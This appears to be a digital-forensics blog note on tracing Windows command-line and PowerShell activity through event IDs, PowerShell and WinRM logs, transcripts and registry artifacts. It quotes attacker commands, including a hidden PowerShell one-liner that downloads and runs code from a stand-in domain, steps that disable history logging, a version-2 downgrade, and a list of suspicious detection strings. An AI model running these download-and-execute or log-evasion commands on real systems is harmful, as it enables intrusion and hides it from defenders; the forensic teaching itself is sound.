Think of the terminal as a magic wand 🪄 of the attacker. The beauty for them is that they can do all sorts of nasty things remotely, but their beauty also lies with their forensics perks: one can review the history of this activity.
🪵 Event Logs
It’s possible to track terminal activity starting from Windows Server 2012R2, but it needs to be enabled by default (too noisy). To enable it: Computer Configuration -> Policies -> Admin Templates -> System -> Audit Process Creation. Once enabled,
4688 (process created, arguments logged) and
4689 (process exited) can show some of this activity. However, even if not enabled explicitly, some events will be logged anyway (suspicious scripts).
👵🏽 Windows XP,
592- tracks process activity but no cmd arguments.
📕 ftp.exe -i -v -s:path\to\file\with\ip # downgrading powershell instance to v2 with -Version 2 📕 powershell -Version 2 -Command blahblah
Your best bet is to first filter for unusual “family relations”, like
🪵 Event logs: 🛡️
Microsoft-Windows-PowerShell%4Operational and 🥝
Windows PowerShell.evtx (to track previous versions invocations) and 📞
Microsoft-Windows-WinRM/Operational for PS remoting (on both source and destination systems. Also, check 🫐
.bash_history on Linux). Turn on here: Group Policy Management -> Computer Configuration -> Policies -> Admin Templates -> Windows comp -> Windows Powershell. When on, find them here 📂
📕 Set-PSReadLineOption 📕 Remove-Module -Name PSReadLine
Transcript logs (similar to 🫐 but also records the output, not default). When 🍓 is on, stored at 📂
\Users\uname\Docuemnts (by default). Turn on here: Computer Configuration -> Admin Templates -> Windows Components -> Windows Powershell -> Turn on PowerShell Transcript logs.
|🏺 Artefact||🖥️ Comment|
|🪵 Event logs||🛡️
|🗄️ Registry||ShimCache, BAM/DAM, AmCache (
✍️ Suspicious scripts are written to the logs and marked as 4104 Warning events even if command line auditing is off.
The attacker might use PowerShell for stealth.
📕 powershell -W Hidden -nop -noni -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://averylegitdomain/averylegitstring') 📕 Invoke-Obfuscation ...
✍️ Bad strings: download, IEX, rundll32.exe, http, StartProcess, InvokeExpression, Invoke-Command, syswow64, FromBase64String, powershell -Version, Invoke-WMIMethod, Invoke-CIMMethod, Reflection, WebClient, bitstransfer.
The attacker could also abuse
%COMSPEC% (used to run
cmd.exe) like this:
%COMSPEC% /C start malicious_script.bat